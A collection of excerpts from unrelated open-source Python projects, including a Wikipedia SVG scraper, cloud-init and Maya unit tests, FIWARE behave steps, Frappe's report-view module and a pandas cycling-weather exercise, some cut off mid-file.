# This is an intermediary header row to remind readers which column is which.
continue
target_cell_imgs = PyQuery(row.find('td')[column]).find('img[alt$=svg]')
if not target_cell_imgs:
continue
row_sign_filenames = []
target_cell_imgs.each(lambda: row_sign_filenames.append(
{
'type': 'sign filename',
'text': PyQuery(this).attr('alt').replace(' ', '_'),
}
))
filenames_to_remove = []
for filename in row_sign_filenames:
# Download the SVG(s).
try:
image_page = PyQuery('http://en.wikipedia.org/wiki/File:{}'.format(filename['text']))
svg_link = image_page.find('a.internal').filter(lambda: this.text_content().strip() == 'Original file')
svg_url = svg_link.attr('href')
if not svg_url:
print(
'Could not find URL for {table_header}: {row_header}: {filename}\n'.format(
table_header=table_header,
row_header=row_header,
filename=filename['text']
)
)
if svg_url.startswith('//'):
# De-relativize to an absolute URL.
svg_url = 'http:' + svg_url
urllib.urlretrieve(svg_url, os.path.join(parsed_args.output_folder, filename['text']))
raw_filename_map[filename['text']] = {
'category': table_header,
'commonName': row_header,
}
except KeyboardInterrupt:
raise
except:
# Plan for success, prepare for absolute destruction of everything you hold dear.
print(
'An unknown error occurred while attempting to retrieve '
'{table_header}: {row_header}: {filename}\n'.format(
table_header=table_header,
row_header=row_header,
filename=filename['text']
)
)
filenames_to_remove.append(filename)
for filename in filenames_to_remove:
row_sign_filenames.remove(filename)
if row_sign_filenames:
table_signs['data'].append({
'type': 'common name',
'text': row_header,
'data': row_sign_filenames,
})
if table_signs['data']:
signs.append(table_signs)
with open(os.path.join(parsed_args.output_folder, parsed_args.common_names_filename), 'w') as json_file:
json.dump({'signs': signs, 'rawFilenameMap': raw_filename_map}, json_file, indent=4)
print('\nAll files written. Enjoy!')
|
prometheanfire/cloud-init | tests/unittests/test_handler/test_handler_locale.py | Python | gpl-3.0 | 2,046 | 0 | # Copyright (C) 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
#
# Based on test_handler_set_hostname.py
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from cloudinit.config import cc_locale
from cloudinit import cloud
from cloudinit import distros
from cloudinit import helpers
from cloudinit import util
from cloudinit.sources import DataSourceNoCloud
from .. import helpers as t_help
from configobj import Confi | gObj
from six import BytesIO
import logging
import shutil
import tempfile
LOG = logging.getLogger(__name__)
class TestLocale(t_help.FilesystemMockingTestCase):
def setUp(self):
super(TestLocale, self).setUp()
self.new_root = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.new_root)
def _get_cloud(self | , distro):
self.patchUtils(self.new_root)
paths = helpers.Paths({})
cls = distros.fetch(distro)
d = cls(distro, {}, paths)
ds = DataSourceNoCloud.DataSourceNoCloud({}, d, paths)
cc = cloud.Cloud(ds, paths, {}, d, None)
return cc
def test_set_locale_sles(self):
cfg = {
'locale': 'My.Locale',
}
cc = self._get_cloud('sles')
cc_locale.handle('cc_locale', cfg, cc, LOG, [])
contents = util.load_file('/etc/sysconfig/language', decode=False)
n_cfg = ConfigObj(BytesIO(contents))
self.assertEqual({'RC_LANG': cfg['locale']}, dict(n_cfg))
|
michcioperz/shirley | shirley.py | Python | mit | 1,574 | 0.003177 | #!/usr/bin/env python3
import argparse, os, subprocess, json, requests, re, string
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("source_host", type=str)
parser.add_argument("target_path", type=str)
args = parser.parse_args()
print("Now, what do we have here?")
r = requests.get("http://%s/otaku/shirley" % args.source_host)
database = json.l | oads(r.text)
print("I see %i series with a total of %i episodes" % (len(database["series"]), len(database["videos"])))
for a in database["series"]:
print("Let's look for some %s" % a)
r = requests.get("http://%s/otaku/api/series/%s/find" % (args.source_host, a))
av = json.loads(r.text)
| print("There are %i episodes of it on the server" % len(av["videos"]))
avd = os.path.join(args.target_path, "".join([x if x in frozenset(string.ascii_letters+string.digits) else "" for x in a]))
if len(av["videos"]) > 0 and not os.path.exists(avd):
os.mkdir(avd)
for avi in av["videos"]:
print("Maybe %s?" % avi)
if not os.path.exists(os.path.join(avd, avi+".avi")):
subprocess.call(["ffmpeg", "-hide_banner", "-i", "http://%s/anime/%s/videoplayback.avi" % (args.source_host, avi), "-s", "320x240", "-acodec", "libmp3lame", "-vcodec", "mpeg4", "-vtag", "XVID", "-qscale", "5", os.path.join(avd, avi+".avi")])
print("Okay, what else...")
else:
print("Aha, it's already there.")
print("Okay, I think it's done, bye.")
|
plotly/python-api | packages/python/plotly/plotly/validators/choropleth/colorbar/_outlinecolor.py | Python | mit | 487 | 0.002053 | import _plotly_utils.basevalidators
class OutlinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name=" | outlinecolor", parent_name="choropleth.colorbar", **kwargs
):
super(OutlinecolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_ | type=kwargs.pop("edit_type", "colorbars"),
role=kwargs.pop("role", "style"),
**kwargs
)
|
robertojrojas/networking-Go | src/DaytimeServer/daytime-client.py | Python | mit | 162 | 0.006173 | import socket
conn= | socket.create_connection(('localhost', 1200))
input = conn.makefile()
print inpu | t.readline()
conn.close()
# You can use telnet localhost 1200
|
telefonicaid/fiware-facts | tests/acceptance/features/component/steps/multi_tenancy.py | Python | apache-2.0 | 7,996 | 0.006005 | # -*- coding: utf-8 -*-
#
# Copyright 2015 Telefónica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es
__author__ = "@jframos"
import behave
from behave import step
from hamcrest import assert_that, equal_to, is_, has_length
from commons.rabbit_utils import RabbitMQConsumer
import qautils.configuration.configuration_utils as configuration_utils
from fiwarefacts_client.window_size_model_utils import get_window_size_rabbitmq_message
from fiwarecloto_client.client import ClotoClient
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_PORT, \
PROPERTIES_CONFIG_SERVICE_HOST, PROPERTIES_CONFIG_SERVICE_USER, PROPERTIES_CONFIG_SERVICE_PASSWORD
from commons.constants import PROPERTIES_CONFIG_RABBITMQ_SERVICE, PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES, \
PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME, PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE, \
PROPERTIES_CONFIG_FACTS_SERVICE, PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID, \
FACTS_DEFAULT_WINDOW_SIZE, PROPERTIES_CONFIG_CLOTO_SERVICE
from qautils.configuration.configuration_properties import PROPERTIES_CONFIG_SERVICE_OS_USERNAME, \
PROPERTIES_CONFIG_SERVICE_OS_PASSWORD, PROPERTIES_CONFIG_SERVICE_RESOURCE, \
PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL, PROPERTIES_CONFIG_SERVICE_PROTOCOL
from commons.step_helpers import send_context_notification_step_helper
from qautils.dataset.dataset_utils import DatasetUtils
from commons.custom_asserts import is_message_in_consumer_list
behave.use_step_matcher("re")
_dataset_utils = DatasetUtils()
@step(u'the secondary tenant-id configured is registered in CLOTO component')
def given_tenant_id_is_registered_in_cloto(context):
context.secondary_tenant_id = \
configuration_utils.config[PROPERTIES_CONFIG_FACTS_SERVICE][PROPERTIES_CONFIG_FACTS_SERVICE_OS_SECONDARY_TENANT_ID]
print ("> Initiating Cloto REST Client for the secondary Tenant")
context.secondary_cloto_client = ClotoClient(
username=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_USERNAME],
password=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_PASSWORD],
tenant_id=context.secondary_tenant_id,
auth_url=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_OS_AUTH_URL],
api_protocol=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PROTOCOL],
api_host=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
api_port=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
api_resource=configuration_utils.config[PROPERTIES_CONFIG_CLOTO_SERVICE][PROPERTIES_CONFIG_SERVICE_RESOURCE])
print ("> A GET request is executed to CLOTO component, "
"to init all data about that secondary tenant in its system.")
_, response = context.secondary_cloto_client.\
get_tenant_id_resource_client().get_tenant_id(context.secondary_tenant_id)
assert_that(response.ok,
"TenantId '{}' for testing cannot be "
"retrieved from CLOTO: Message: {}".format(context.secondary_tenant_id, response.text))
@step(u'the following notifications are received for "(?P<server_id>.*)" and secondary tenant-id with values')
@step(u'a context notification is received for "(?P<server_id>.*)" and secondary tenant-id with values')
def | a_context_update_is_received_for_secondary_tenant(context, server_id):
send_context_notification_step_helper(context, context.secondary_tenant_id, server_id)
@step(u'a new secondary RabbitMQ consumer is looking into the configured | message bus')
def new_secondaty_consumer_looking_for_messages(context):
# Init RabbitMQ consumer
context.secondaty_rabbitmq_consumer = RabbitMQConsumer(
amqp_host=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_HOST],
amqp_port=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PORT],
amqp_user=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_USER],
amqp_password=configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_SERVICE_PASSWORD])
facts_message_config = \
configuration_utils.config[PROPERTIES_CONFIG_RABBITMQ_SERVICE][PROPERTIES_CONFIG_RABBITMQ_SERVICE_FACTS_MESSAGES]
context.secondaty_rabbitmq_consumer.exchange = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_NAME]
context.secondaty_rabbitmq_consumer.exchange_type = \
facts_message_config[PROPERTIES_CONFIG_RABBITMQ_SERVICE_EXCHANGE_TYPE]
# Append consumer to the 'context' consumer list
context.rabbitmq_consumer_list.append(context.secondaty_rabbitmq_consumer)
# Set default window size to 2 (FACTS) - Secondary Tenant
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, FACTS_DEFAULT_WINDOW_SIZE)
context.rabbitmq_publisher.send_message(message)
# Run secondary consumer
context.secondaty_rabbitmq_consumer.routing_key = context.secondary_tenant_id
context.secondaty_rabbitmq_consumer.run_as_thread()
@step(u'the message sent to RabbitMQ with the secondary tenant has got the following monitoring attributes')
@step(u'the messages sent to RabbitMQ with the secondary tenant have got the following monitoring attributes')
def following_messages_are_sent_to_secondary_consumer(context):
for element in context.table.rows:
expected_message = dict(element.as_dict())
expected_message = _dataset_utils.prepare_data(expected_message)
assert_that(expected_message, is_message_in_consumer_list(context.secondaty_rabbitmq_consumer.message_list),
"A message with the expected content has not been received by the secondary RabbitMQ consumer")
@step(u'no messages have been received by the secondary RabbitMQ consumer')
def no_messages_received_for_secondary_tenant(context):
print ("> Received main list: " + str(context.secondaty_rabbitmq_consumer.message_list))
print ("> Received seconday list: " + str(context.rabbitmq_consumer.message_list))
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(0),
"Secondary RabbitMQ consumer has retrieved messages from the bus, and it should NOT")
@step(u'"(?P<number_of_notifications>.*)" notification is sent to RabbitMQ with the secondary tenant')
@step(u'"(?P<number_of_notifications>.*)" notifications are sent to RabbitMQ with the secondary tenant')
def notifications_are_received_by_secondary_consumer(context, number_of_notifications):
assert_that(context.secondaty_rabbitmq_consumer.message_list, has_length(int(number_of_notifications)),
"Secondary RabbitMQ consumer has NOT retrieved the expected number of messages from the bus")
@step(u'window size is set to "(?P<window_size>.*)" for the secondary tenant')
def window_size_is_set(context, window_size):
message = get_window_size_rabbitmq_message(context.secondary_tenant_id, window_size)
context.rabbitmq_publisher.send_message(message)
|
goddardl/cortex | test/IECoreMaya/FnParameterisedHolderTest.py | Python | bsd-3-clause | 35,854 | 0.071791 | ##########################################################################
#
# Copyright (c) 2008-2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import os
import unittest
import maya.cmds
import maya.OpenMaya
import IECore
import IECoreMaya
class TestOp( IECore.Op ) :
def __init__( self ) :
IECore.Op.__init__( self, "Tests stuff",
IECore.IntParameter(
name = "result",
description = "",
defaultValue = 0
)
)
self.parameters().addParameters(
[
IECore.IntParameter(
name = "i",
description = "i",
defaultValue = 1
),
]
)
def doOperation( self, args ) :
return IECore.IntData( 10 )
class FnParameterisedHolderTest( IECoreMaya.TestCase ) :
def test( self ) :
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
self.assertEqual( fnPH.getParameterised(), ( None, "", 0, "" ) )
op = TestOp()
fnPH.setParameterised( op )
parameterisedTuple = fnPH.getParameterised()
self.assert_( parameterisedTuple[0].isSame( op ) )
self.assertEqual( parameterisedTuple[1:], ( "", 0, "" ) )
self.assertEqual( parameterisedTuple[0](), IECore.IntData( 10 ) )
iPlug = fnPH.parameterPlug( op["i"] )
self.assert_( isinstance( iPlug, maya.OpenMaya.MPlug ) )
self.assert_( iPlug.asInt(), 1 )
self.assert_( fnPH.plugParameter( iPlug ).isSame( op["i"] ) )
self.assert_( fnPH.plugParameter( iPlug.name() ).isSame( op["i"] ) )
iPlug.setInt( 2 )
fnPH.setParameterisedValue( op["i"] )
self.assert_( op["i"].getNumericValue(), 2 )
op["i"].setNumericValue( 3 )
fnPH.setNodeValue( op["i"] )
self.assert_( iPlug.asInt(), 3 )
iPlug.setInt( 10 )
fnPH.setParameterisedValues()
self.assert_( op["i"].getNumericValue(), 10 )
op["i"].setNumericValue( 11 )
fnPH.setNodeValues()
self.assert_( iPlug.asInt(), 11 )
def testFullPathName( self ) :
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
self.assertEqual( node, fnPH.fullPathName() )
procedural = maya.cmds.createNode( "ieProceduralHolder" )
fnPH = IECoreMaya.FnParameterisedHolder( procedural )
self.assertEqual( maya.cmds.ls( procedural, long=True )[0], fnPH.fullPathName() )
def testPlugParameterWithNonUniqueNames( self ) :
node = maya.cmds.createNode( "ieProceduralHolder" )
node2 = maya.cmds.createNode( "ieProceduralHolder" )
node = maya.cmds.ls( maya.cmds.rename( node, "iAmNotUnique" ), long=True )[0]
node2 = maya.cmds.ls( maya.cmds.rename( node2, "iAmNotUnique" ), long=True )[0]
fnPH = IECoreMaya.FnProceduralHolder( node )
proc = IECore.ReadProcedural()
fnPH.setParameterised( proc )
self.assert_( fnPH.getParameterised()[0].isSame( proc ) )
fnPH2 = IECoreMaya.FnProceduralHolder( node2 )
proc2 = IECore.ReadProcedural()
fnPH2.setParameterised( proc2 )
self.assert_( fnPH2.getParameterised()[0].isSame( proc2 ) )
# check that each function set references a different node.
self.assert_( fnPH.object()!=fnPH2.object() )
self.assert_( fnPH.fullPathName()!=fnPH2.fullPathName() )
plug = fnPH.parameterPlug( proc["motion"]["blur"] )
plug2 = fnPH2.parameterPlug( proc2["motion"]["blur"] )
self.assertEqual( plug.node(), fnPH.object() )
self.assertEqual( plug2.node(), fnPH2.object() )
self.assertEqual( fnPH.parameterPlugPath( proc["motion"]["blur"] ), "|transform1|iAmNotUnique.parm_motion_blur" )
self.assertEqual( fnPH2.parameterPlugPath( proc2["motion"]["blur"] ), "|transform2|iAmNotUnique.parm_motion_blur" )
self.assert_( maya.cmds.isConnected( "time1.outTime", fnPH.parameterPlugPath( proc["files"]["frame"] ), iuc=True ) )
self.assert_( maya.cmds.isConnected( "time1.outTime", fnPH2.parameterPlugPath( proc2["files"]["frame"] ), iuc=True ) )
def testSetNodeValuesUndo( self ) :
# make an opholder
########################################################### | ###############
node = maya.cmds.createNode( "ieOpHolderNode" )
fnPH = IECoreMaya.FnParameterisedHolder( node )
op = IECore.ClassLoader.defaultOpLoader().load( "parameterTypes", 1 )()
op.parameters().removeParameter( "m" ) # no color4f support in maya
fnPH.setParameterised( op )
# check we have the starting values we expect
#################################################### | #######################
self.assertEqual( op["a"].getNumericValue(), 1 )
aPlug = fnPH.parameterPlug( op["a"] )
self.assertEqual( aPlug.asInt(), 1 )
self.assertEqual( op["b"].getNumericValue(), 2 )
bPlug = fnPH.parameterPlug( op["b"] )
self.assertEqual( bPlug.asFloat(), 2 )
self.assertEqual( op["c"].getNumericValue(), 3 )
cPlug = fnPH.parameterPlug( op["c"] )
self.assertEqual( cPlug.asDouble(), 3 )
self.assertEqual( op["d"].getTypedValue(), "ssss" )
dPlug = fnPH.parameterPlug( op["d"] )
self.assertEqual( dPlug.asString(), "ssss" )
self.assertEqual( op["e"].getValue(), IECore.IntVectorData( [ 4, -1, 2 ] ) )
ePlug = fnPH.parameterPlug( op["e"] )
fnE = maya.OpenMaya.MFnIntArrayData( ePlug.asMObject() )
self.assertEqual( fnE[0], 4 )
self.assertEqual( fnE[1], -1 )
self.assertEqual( fnE[2], 2 )
self.assertEqual( fnE.length(), 3 )
self.assertEqual( op["f"].getValue(), IECore.StringVectorData( [ "one", "two", "three" ] ) )
fPlug = fnPH.parameterPlug( op["f"] )
fnF = maya.OpenMaya.MFnStringArrayData( fPlug.asMObject() )
fList = []
fnF.copyTo( fList )
self.assertEqual( fList, [ "one", "two", "three" ] )
self.assertEqual( op["g"].getTypedValue(), IECore.V2f( 1, 2 ) )
gPlug = fnPH.parameterPlug( op["g"] )
self.assertEqual( gPlug.child( 0 ).asFloat(), 1 )
self.assertEqual( gPlug.child( 1 ).asFloat(), 2 )
self.assertEqual( op["h"].getTypedValue(), IECore.V3f( 1, 1, 1 ) )
hPlug = fnPH.parameterPlug( op["h"] )
self.assertEqual( hPlug.child( 0 ).asFloat(), 1 )
self.assertEqual( hPlug.child( 1 ).asFloat(), 1 )
self.assertEqual( hPlug.child( 2 ).asFloat(), 1 )
self.assertEqual( op["q"].getTypedValue(), False )
qPlug = fnPH.parameterPlug( op["q"] )
self.assertEqual( qPlug.asBool(), False )
self.assertEqual( op["t"].getTypedValue(), IECore.Box3f( IECore.V3f( -1 ), IECore.V3f( 1 ) ) )
tPlug = fnPH.parameterPlug( op["t"] )
self.assertEqual( tPlug.child( 0 ).child( 0 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 0 ).child( 1 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 0 ).child( 2 ).asFloat(), -1 )
self.assertEqual( tPlug.child( 1 ).child( 0 ).asFloat(), 1 )
self.assertEqual( tPlug.child( 1 ).child( |
rohitwaghchaure/frappe | frappe/desk/reportview.py | Python | mit | 8,532 | 0.034341 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""build query for doclistview and return results"""
import frappe, json
import frappe.permissions
from frappe.model.db_query import DatabaseQuery
from frappe import _
@frappe.whitelist()
def get():
args = get_form_params()
data = compress(execute(**args), args = args)
return data
def execute(doctype, *args, **kwargs):
return DatabaseQuery(doctype).execute(*args, **kwargs)
def get_form_params():
"""Stringify GET request parameters."""
data = frappe._dict(frappe.local.form_dict)
del data["cmd"]
if isinstance(data.get("filters"), basestring):
data["filters"] = json.loads(data["filters"])
if isinstance(data.get("fields"), basestring):
data["fields"] = json.loads(data["fields"])
if isinstance(data.get("docstatus"), basestring):
data["docstatus"] = json.loads(data["docstatus"])
if isinstance(data.get("save_user_settings"), basestring):
data["save_user_settings"] = json.loads(data["save_user_settings"])
else:
data["save_user_settings"] = True
# queries must always be server side
data.query = None
return data
def compress(data, args = {}):
"""separate keys and values"""
from frappe.desk.query_report import add_total_row
if not data: return data
values = []
keys = data[0].keys()
for row in data:
new_row = []
for key in keys:
new_row.append(row[key])
values.append(new_row)
if args.get("add_total_row"):
meta = frappe.get_meta(args.doctype)
values = add_total_row(values, keys, meta)
return {
"keys": keys,
"values": values
}
@frappe.whitelist()
def save_report():
"""save report"""
data = frappe.local.form_dict
if frappe.db.exists('Report', data['name']):
d = frappe.get_doc('Report', data['name'])
else:
d = frappe.new_doc('Report')
d.report_name = data['name']
d.ref_doctype = data['doctype']
d.report_type = "Report Builder"
d.json = data['json']
frappe.get_doc(d).save()
frappe.msgprint(_("{0} is saved").format(d.name))
return d.name
@frappe.whitelist()
def export_query():
"""export from report builder"""
form_params = get_form_params()
form_params["limit_page_length"] = None
form_params["as_list"] = True
doctype = form_params.doctype
add_totals_row = None
file_format_type = form_params["file_format_type"]
del form_params["doctype"]
del form_params["file_format_type"]
if 'add_totals_row' in form_params and form_params['add_totals_row']=='1':
add_totals_row = 1
del form_params["add_totals_row"]
frappe.permissions.can_export(doctype, raise_exception=True)
db_query = DatabaseQuery(doctype)
ret = db_query.execute(**form_params)
if add_totals_row:
ret = append_totals_row(ret)
data = [['Sr'] + get_labels(db_query.fields, doctype)]
for i, row in enumerate(ret):
data.append([i+1] + list(row))
if file_format_type == "CSV":
# convert to csv
import csv
from cStringIO import StringIO
f = StringIO()
writer = csv.writer(f)
for r in data:
# encode only unicode type strings and not int, floats etc.
writer.writerow(map(lambda v: isinstance(v, unicode) and v.encode('utf-8') or v, r))
f.seek(0)
frappe.response['result'] = unicode(f.read(), 'utf-8')
frappe.response['type'] = 'csv'
frappe.response['doctype'] = doctype
elif file_format_ | type == "Excel":
from frappe.utils.xlsxutils import make_xlsx
xlsx_file = make_xlsx(data, doctype)
frappe.response['filename'] = doctype + '.xlsx'
frappe.response['filecontent'] = xlsx_file.getvalue()
frap | pe.response['type'] = 'binary'
def append_totals_row(data):
if not data:
return data
data = list(data)
totals = []
totals.extend([""]*len(data[0]))
for row in data:
for i in xrange(len(row)):
if isinstance(row[i], (float, int)):
totals[i] = (totals[i] or 0) + row[i]
data.append(totals)
return data
def get_labels(fields, doctype):
"""get column labels based on column names"""
labels = []
for key in fields:
key = key.split(" as ")[0]
if "." in key:
parenttype, fieldname = key.split(".")[0][4:-1], key.split(".")[1].strip("`")
else:
parenttype = doctype
fieldname = fieldname.strip("`")
df = frappe.get_meta(parenttype).get_field(fieldname)
label = df.label if df else fieldname.title()
if label in labels:
label = doctype + ": " + label
labels.append(label)
return labels
@frappe.whitelist()
def delete_items():
"""delete selected items"""
import json
il = json.loads(frappe.form_dict.get('items'))
doctype = frappe.form_dict.get('doctype')
for i, d in enumerate(il):
try:
frappe.delete_doc(doctype, d)
if len(il) >= 5:
frappe.publish_realtime("progress",
dict(progress=[i+1, len(il)], title=_('Deleting {0}').format(doctype)),
user=frappe.session.user)
except Exception:
pass
@frappe.whitelist()
def get_sidebar_stats(stats, doctype, filters=[]):
cat_tags = frappe.db.sql("""select tag.parent as category, tag.tag_name as tag
from `tabTag Doc Category` as docCat
INNER JOIN tabTag as tag on tag.parent = docCat.parent
where docCat.tagdoc=%s
ORDER BY tag.parent asc,tag.idx""",doctype,as_dict=1)
return {"defined_cat":cat_tags, "stats":get_stats(stats, doctype, filters)}
@frappe.whitelist()
def get_stats(stats, doctype, filters=[]):
"""get tag info"""
import json
tags = json.loads(stats)
if filters:
filters = json.loads(filters)
stats = {}
columns = frappe.db.get_table_columns(doctype)
for tag in tags:
if not tag in columns: continue
tagcount = frappe.get_list(doctype, fields=[tag, "count(*)"],
#filters=["ifnull(`%s`,'')!=''" % tag], group_by=tag, as_list=True)
filters = filters + ["ifnull(`%s`,'')!=''" % tag], group_by = tag, as_list = True)
if tag=='_user_tags':
stats[tag] = scrub_user_tags(tagcount)
stats[tag].append(["No Tags", frappe.get_list(doctype,
fields=[tag, "count(*)"],
filters=filters +["({0} = ',' or {0} is null)".format(tag)], as_list=True)[0][1]])
else:
stats[tag] = tagcount
return stats
@frappe.whitelist()
def get_filter_dashboard_data(stats, doctype, filters=[]):
"""get tags info"""
import json
tags = json.loads(stats)
if filters:
filters = json.loads(filters)
stats = {}
columns = frappe.db.get_table_columns(doctype)
for tag in tags:
if not tag["name"] in columns: continue
tagcount = []
if tag["type"] not in ['Date', 'Datetime']:
tagcount = frappe.get_list(doctype,
fields=[tag["name"], "count(*)"],
filters = filters + ["ifnull(`%s`,'')!=''" % tag["name"]],
group_by = tag["name"],
as_list = True)
if tag["type"] not in ['Check','Select','Date','Datetime','Int',
'Float','Currency','Percent'] and tag['name'] not in ['docstatus']:
stats[tag["name"]] = list(tagcount)
if stats[tag["name"]]:
data =["No Data", frappe.get_list(doctype,
fields=[tag["name"], "count(*)"],
filters=filters + ["({0} = '' or {0} is null)".format(tag["name"])],
as_list=True)[0][1]]
if data and data[1]!=0:
stats[tag["name"]].append(data)
else:
stats[tag["name"]] = tagcount
return stats
def scrub_user_tags(tagcount):
"""rebuild tag list for tags"""
rdict = {}
tagdict = dict(tagcount)
for t in tagdict:
if not t:
continue
alltags = t.split(',')
for tag in alltags:
if tag:
if not tag in rdict:
rdict[tag] = 0
rdict[tag] += tagdict[t]
rlist = []
for tag in rdict:
rlist.append([tag, rdict[tag]])
return rlist
# used in building query in queries.py
def get_match_cond(doctype):
cond = DatabaseQuery(doctype).build_match_conditions()
return ((' and ' + cond) if cond else "").replace("%", "%%")
def build_match_conditions(doctype, as_condition=True):
match_conditions = DatabaseQuery(doctype).build_match_conditions(as_condition=as_condition)
if as_condition:
return match_conditions.replace("%", "%%")
else:
return match_conditions
def get_filters_cond(doctype, filters, conditions):
if filters:
flt = filters
if isinstance(filters, dict):
filters = filters.items()
flt = []
for f in filters:
if isinstance(f[1], basestring) and f[1][0] == '!':
flt.append([doctype, f[0], '!=', f[1][1:]])
|
HEG-Arc/Appagoo | appagoo/config/__init__.py | Python | bsd-3-clause | 288 | 0 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from .local import Local # noqa
f | rom .production import Production # noqa
# This will make sure the app is always im | ported when
# Django starts so that shared_task will use this app.
from .celery import app as celery_app
|
Vauxoo/website | website_lazy_load_image/models/__init__.py | Python | agpl-3.0 | 25 | 0 | from . | import ir_ | ui_view
|
mohanprasath/Course-Work | data_analysis/uh_data_analysis_with_python/hy-data-analysis-with-python-spring-2020/part05-e02_cycling_weather/src/cycling_weather.py | Python | gpl-3.0 | 1,517 | 0.009967 | #!/usr/bin/env python3
import pandas as pd
def split_date(df):
days = {"ma": "Monday", "ti": "Tuesday", "ke": "Wednesday", "to": "Thuday", "pe": "Friday", "la": "Satday", "su": "Sunday"}
months = {"tammi": 1, "helmi": 2, "maalis": 3, "huhti": 4, "touko": 5, "kesä": 6,
"heinä": 7, "elo": 8, "syys": 9, "loka": 10, "marras": 11, "joulu": 12,}
d = df["Päivämäärä"].str.split(expand=True)
d.columns = ["Weekday", "Day", "Month", "Year", "Hour"]
hourmin = d["Hour"].str.split(":", expand=True)
d["Hour"] = hourmin.iloc[:, 0]
d["Weekday"] = d["Weekday"].map(days)
d["Month"] = d["Month"].map(months)
d = d.astype({"Weekday": object, "Day": int, "Month": int, "Year": int, "Hour": int})
return d
def cycling_weather():
# file 1
df = pd.read_csv("src/Helsingin_pyorailijamaarat.csv", sep=";")
df = df.dropna(how='all') # remove rows with only missing values
df = df.dropna(how='all', axis='columns') # remove columns with only missing values
split_df = split_date(df)
df = df.drop(columns="Päivämäärä")
pyo_df = pd.concat([split_df, df], axis=1)
# file 2
wea_df = pd.read_csv("src/kumpula-weather-2017.cs | v", sep=",")
